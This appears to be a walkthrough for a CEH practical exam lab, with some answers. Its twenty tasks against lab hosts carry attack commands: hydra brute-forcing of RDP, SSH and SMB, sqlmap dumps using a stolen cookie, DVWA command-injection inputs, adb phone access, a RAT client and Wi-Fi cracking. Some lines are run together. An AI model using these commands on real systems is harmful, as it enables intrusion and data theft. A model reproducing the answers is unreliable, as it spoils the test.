
 1.  sudo nmap -Pn -n -p- -A --min-rate 5000 <DC IP>
2.  While investigating an attack, you found that a windows web development environment  was exploited to gain access to the system. Perform extensive scanning and service enumeration of the target and identify the number of mercury services running in the server. (Format: N).  Ans: 7. usually i found that all mercury services on ip which is 192.168.44.32. sudo nmap -Pn -n -sV -p- --min-rate 5000 192.168.44.32 3. Identify a machine with RDP service enabled in the 10.10.55.0/24 subnet. Crack the RDP credentials for user jones and obtain a file hide.cfe containing an encrypted images file. Decrypt the file and enter the CRC32 value of the images file as the answer. Note : Use jones’s password to extract the images file.. (Format: NaaNNNaa). sudo nmap -Pn -n -p 3389 --open --min-rate 5000 10.10.55.0/24 -> find rdp enabled windows machine. hydra -L jones -P /home/attack/Desktop/passwords.txt rdp:// 10.10.55.11 -t 30 -> bruteforcing creds. xfreerdp /v:10.10.55.11 /u: joneshide.cfe -> it is encrypted using CryptForge, to decrypt > select file > right click > decrypt. In Windows 11 machine navigate to E:\CEH-Tools\CEHv12 Module 20 Cryptography\MD5 and MD6 Hash Calculators\HashMyFiles and double click HashMyFiles.exe. Open hide with hashmyfiles utility > scroll righ side > there you can see crc32 value. 4. An insider attack involving one of the employees’s mobile device in the 10.10.55.0/24  subnet has been identified. You are assigned to covertly access the user’s device and obtain hidden data in the image file. Analyse the image file and extract the sensitive data hidden in the file and extract the sensitive data hidden in the files and enter the secret code as the answer. (Format : A*AaAa*AN). sudo nmap -Pn -n -p 5555 --open 10.10.55.0/24 --min-rate 5000 -> identify mobile in subnet. adb connect <Mobile ip>:5555 adb shell >     in shell : search for image file generally it will be in /sdcard/Download > exit adb pull /sdcard/Download /home/attacker(our machine directory to save files). cd Download sudo python3 -m http.server 80 -> to transfer image file to windows in windows(Workstation 2) : To Download image file from parrot Certutil.exe -Urlcache -f http://172.20.10.10/Ceh.jpg C: \path\to\save\file\Ceh.jpg Navigate to E:\CEHv12 Module 06 System Hacking\Steganography Tools\Image Steganography Tools\OpenStego, open it > choose Extract data > select image file Ceh.jpg > select folder to save extracted file > Click on extract data. 5. Perform a vulnerability scan for the host with IP address 192.168.44.32. what is the CVE number of the vulnerability with least severity score? (Format:AAA-NNNN-NNNN). 6. Exploit a remote login and command-line execution application on a Linux target in the 10.10.55.0/24 subnet to access a sensitive file. Netnormal.txt. Enter the content in the file as the answer. (Format : ANaN*ANaN). sudo nmap -Pn -n -p22,23,3389 --open 10.10.55.0/24 --minrate 5000 -> identify Ip sudo nmap -Pn -n -A --min-rate 5000 <Ip> -> to confirm it's linux. hydra -L /home/attacker/Desktop/usernames.txt -P /home/ attacker/Desktop/passwords.txt -t 30 -f ssh linuxadmin@<ip address> find / -name Netnormal.txt -type f 2>/dev/null > cat Netnormal.txt. 7. An Ex-employee of an organization has stolen a vital account credential and stored in a double-encrypted file named restricted.txt before leaving the organization. The credentials are a nine-character alphanumeric string. Enter the credentials as the answer. The restricted.txt file has been identified in the employee email attachment and stored in the “EH-Workstation 2” machine in the Documents. You have learned that “password” is the extract credentials from the restricted.txt. (Format : aaaaa*NNN). Copy the restricted file which is in Documents folder Navigate to E:\CEH-Tools\CEHv12 Module 06 System Hacking\Steganography Tools\Whitespace Steganography Tools > paste restricted.txt > .\Snow.exe -C -p password . \restricted.txt > copy the string > open  cyber chief or crack station online > paste > click on decrypt. 8. Exploit weak credentials used for SMB service on a windows machine in the 10.10.55.0/24 subnet. Obtain the file sniffer.txt hosted on the smb root, and enter its content as the answer. (Format: a*aaNaNNa). sudo nmap -Pn -n -p 445 --open 10.10.55.0/24 --min-rate 5000 -> find device. hydra -L ./usernames.txt -P ./passwords.txt -t 30 smb:// 10.10.55.11 smbmap -H 10.10.55.11 (-u james -p qw3rty (optional)) -> find shares smbclient //10.10.55.11//Users/ get sniffer.txt > cat sniffer.txt 9. You are assigned to analyse and perform static malware analysis on a malicious executable file hell.exe located in Downloads folder of EHWorkstation-2. Determine the Linker Version number of the executable file as answer. (Format : N*NN). eh-workstation-2 (windows) navigate to E:\CEH-Tools\CEHv12 Module 07 Malware Threats\Malware Analysis Tools\Static Malware Analysis Tools\Packaging and Obfuscation Tools\PEid The PEiD main window appears. Click the Browse button to upload a malicious file for analysis. The Choose the file to open window appears; navigate to Downloads folder > choose hell.exe > click on Open. 10. A disgruntled ex-employee Martin has hidden some confidential files in a folder “Scan” in a windows machine in the 10.10.55.0/24 subnet. You cannot physically access the target machine, but you know that the organization has installed a RAT in the machine for remote administrator purposes. Your task is to check how many files present in the scan folder and enter the number of files sniffed by the employee as answer. (Format: N). sudo nmap -Pn -n -p 6703 10.10.55.0/24 --min-rate 5000 -> find device note the <Ip Address> Navigate to E:\CEH-Tools\CEHv12 Module 07 Malware Threats\Trojans Types\Remote Access Trojans (RAT)\Theef and double-click Client210.exe to access the victim machine remotely. Enter the IP address of the target machine in the IP field, and leave the Port and FTP fields set to default; click Connect. Click on File explorer icon > File manager > Expand Hard Drive C: > Users folder > Martin Folder > and find Scan folder > count file present in Scan folder > Enter it as answer. 11. During an assignment, an incident response has detected a suspicious executable file “Strange_File-1”. Your task as a malware analysis is to determine the size of the PT_LOAD(0) segment using SHA224 hash method. The file is in the C:\Users\Admin\Documents directory in the “EH-workstation-2” machine. (Format: NNNaNNaa). In the Windows 11(Workstation-2), navigate to E:\CEHTools\CEHv12 Module 07 Malware Threats\Malware Analysis Tools\Static Malware Analysis Tools\Packaging and Obfuscation Tools\DIE and double-click die.exe. The Open file… window appears; navigate to C: \Users\Admin\Documents choose "Strange_File-1". Right Top Corner there you can "Hash" button" > Click on it > At top you can see Method (select sha224) > in result you can see Size of PT_LOAD(0). 12. You are investigating a massive DDoS attack launched against a target at 172.22.10.10. Your objective is to identify the packets responsible for the attack and determine the least IPv4 packet count sent to the victim machine. The network capture file “Evil-Traffic.pcapng” is saved in the Document folder of the “EH-Workstation-2” windows 11 machine (Format:NNNNN). Open wire shark in windows machine  >  Choose "EvilTraffic.pcapng"  > From upper options "Statistics" > "IPv4 Statistics" > Source and destination Addresses > Type ip.dst == 172.22.10.10 (In Display Filter). 13. Perform as SQL injection attack on your target web application cinema.cehorg.com and extract the password of user Daniel. You have already registered on the website with credentials Karen/computer. (Format:aaaaaaaaa). Login into cinema.cehorg.com with credentials. Click on View Profile > Copy the Url (save it in notepad) > Right click > Inspect element > console > document.cookie > Copy the Cookie value (save it in notepad). sqlmap -u <url> --cookie <cookie value> --dbssqlmap -u <url> --cookie <cookie value> -D cinema_database --tables sqlmap -u <url> --cookie <cookie value> -D cinema_database -T Users_Login --dump 14. Explore the web application at www.cehorg.com and enter the flag’s value on the page with page_id=95. (Format : A**NNAA). visit page www.cehorg.com in website you can ethical hacking hyper link -> link on it you can observe the url parameter was changed > scroll down to see flag value. 15. Perform vulnerability research and exploit the web application training.cehorg.com, available at 10.10.55.50. Locate the Flag.txt file and enter its content as the answer. (Format: A*a*aNNN). dirb http://training.cehorg.com -X .txt http://training.cehorg.com/Flag.txt 16. Perform SQL injection attack on a web application, cybersec.cehorg.com, available at 192.168.44.40. find the value in the flag column in one of the db tables and enter it as the answer. (Format: *aNNaNaAA). visit cybersec.cehorg.com website > scroll down to bottom > there you can see blog hyperlink > click on it > you can observe that the url was chaged with id parameter > copy the url. - Enumerate all databases until find the table with flag column. sqlmap -u <url with id parameter> --dbs sqlmap -u <url with id parameter> -D databasename --tables sqlmap -u <url with id parameter> -D databasename -T flag -dump 17. A set of files has been uploaded through DVWA (http:// 192.168.44.32:8080/DVWA). The files are located in the “C: \Wamp64\www\DVWA\ECweb\Certified\” directory. Access the files and decode the base64 ciphers reveal the original message among them. Enter the decrypted message as the answer. You can log into the DVWA using the credentials admin/password. (Format: A*aaa*AA).login to the dvwa application > set security level low > choose command execution type below commands: | dir "C:\Wamp64\www\DVWA\ECweb\Certified" > there are 3 Cipher.txt files. | type "C:\Wamp64\www\DVWA\ECweb\Certified\Cipher1.txt" | type "C:\Wamp64\www\DVWA\ECweb\Certified\Cipher2.txt" | type "C:\Wamp64\www\DVWA\ECweb\Certified\Cipher3.txt" Use online cyber-chief application to crack : https:// gchq.github.io/CyberChef/ 18. Analyse the traffic capture from an IoT network located in the Documents folder of the “EH-Workstation -1” (ParrotSecurity) machine, identify the packet with IoT Publish Message, and enter the “Topic Length” as the answer. (Format: N). Open IoT capture file in wireshark mqtt and mqtt.msgtype == 3 19. A disgruntled employee of your target organisation has stolen the company’s trade secrets and encrypted them using Veracrypt. The Veracrypt volume file “Its_File” is stored on the C: drive of the required to access the veracrypt volumes has been hashed and saved in a “txt” file in the Documents folder of “EH-Workstation -1” (parrot security) company, you need to decrypt the hash in the Hash2Crack.txt” file, access the veracrypt volume, and find the secret code in the file named EC_data.txt. (Format: NA*aNaa*A). move to parrot machine > cat Hash2crack.txt > it may be md5 > use crackstation online to crack. now, shift back to windows machine > open veracrypt > choose any alphabet > click on browse file and select "Its_File" > click on mount > prompt for password > enter password > move the new drive > there you can see file. 20. Your organisation suspects the presence of a rogue AP in the vicinity. You are tasked with cracking the wireless encryption, connecting to the network, and setting up a honeypot. The airdump-ng tool has been used, and the WiFi traffic capture named “Wifi_Pcap.cap” is located in 20. the Documents folder in “EH-Workstation-1” (parrot machine). Crack the wireless encryption and enter the total number of characters present in the wi-fi password. (Format:N). Open wifi_pcap.cap in wireshark > apply display fileter : wlan.bssid -> to find bssid of access point. aircrack-ng -a2 -b <bssid> ./wifi_pcap.cap -w ./ passwords.txt 